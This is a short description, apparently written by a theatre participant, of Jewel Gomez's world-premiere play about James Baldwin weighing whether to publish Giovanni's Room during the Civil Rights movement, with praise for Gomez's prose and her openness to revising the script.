Description

To publish or not to publish—that was James Baldwin’s dilemma about whether or not he should publish his openly gay novel, Giovanni’s Room, during the height of the Civil Rights movement in this world premiere by author Jewel Gomez. I had been involved in several readings of the work during its development and what amazed me about working with Jewel in addition to her beautiful prose, was how easily she could make major changes in the script for the good of the storytelling without worrying about what was being cut.
